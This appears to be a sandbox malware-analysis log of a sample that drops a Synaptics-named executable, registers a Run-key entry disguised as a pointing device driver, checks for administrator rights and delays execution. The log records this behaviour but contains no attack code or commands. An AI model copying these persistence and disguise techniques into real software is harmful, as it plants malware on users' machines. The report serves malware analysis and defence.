                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: ntmarta.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: iertutil.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: sspicli.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: ondemandconnroutehelper.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: winhttp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: mswsock.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: iphlpapi.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: winnsi.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: napinsp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: pnrpnsp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: wshbth.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: nlaapi.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: dnsapi.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: winrnr.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: acgenral.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: advpack.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: devrtl.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: spinf.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: drvstore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: spfileq.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: inseng.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ieadvpack.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\sY99VLt.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeWindow found: window name: SysTabControl32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeWindow detected: Installing Microsoft(R) DirectX(R)Welcome to setup for DirectXThe DirectX setup wizard guides you through installation of DirectX Runtime Components. Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement. You must accept the agreement to continue the setup.MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT DIRECTX END USER RUNTIMEThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any Microsoft* updates* supplements* Internet-based services and * support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1. INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2. SCOPE OF LICENSE. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. 
You may not* work around any technical limitations in the software;* reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;* make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;* publish the software for others to copy;* rent lease or lend the software;* transfer the software or this agreement to any third party; or* use the software for commercial software hosting services.3. BACKUP COPY. You may make one backup copy of the software. You may use it only to reinstall the software.4. DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations end users and end use. For additional information see www.microsoft.com/exporting.6. SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7. ENTIRE AGREEMENT. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8. APPLICABLE LAW.a. United States. If you acquired the s
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                          Source: file.exeStatic file information: File size 1059840 > 1048576
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                          Source: Binary string: wextract.pdb source: file.exe, ._cache_file.exe.0.dr
                          Source: Binary string: dxwsetup.pdb source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043761767.0000000000D91000.00000020.00000001.01000000.00000007.sdmp
                          Source: Binary string: wextract.pdbU source: file.exe, ._cache_file.exe.0.dr
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100198B LocalFree,RegCreateKeyExA,wsprintfA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetModuleFileNameA,RegCloseKey,wsprintfA,lstrlenA,RegSetValueExA,RegCloseKey,LocalFree,2_2_0100198B

Persistence and Installation Behavior

                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dllJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET1013.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\._cache_file.exeJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\RCXE9B.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dllJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\RCXE9B.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET1013.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010022FF LocalFree,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcmpiA,lstrcmpiA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,lstrcpyA,lstrcpyA,GetShortPathNameA,wsprintfA,lstrcmpiA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,wsprintfA,LocalAlloc,GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,2_2_010022FF
                          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe; Dropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe; Dropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dll
Source: C:\Users\user\Desktop\._cache_file.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe; Dropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\SET1013.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe; Dropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmp
Source: C:\Users\user\Desktop\._cache_file.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dll
Source: C:\Users\user\Desktop\._cache_file.exe; Evasive API call chain: RegOpenKey, DecisionNodes, ExitProcess (graph_2-3756)
Source: C:\Users\user\Desktop\._cache_file.exe; Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_2-3055)
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7704; Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\._cache_file.exe; Code function: 2_2_01001C7F lstrcpyA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcmpA,lstrcmpA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_01001C7F
Source: C:\Users\user\Desktop\._cache_file.exe; Code function: 2_2_01004B1A lstrcpyA,GetSystemInfo,lstrcpyA,CreateDirectoryA,RemoveDirectoryA,2_2_01004B1A
Source: C:\ProgramData\Synaptics\Synaptics.exe; Thread delayed: delay time: 60000
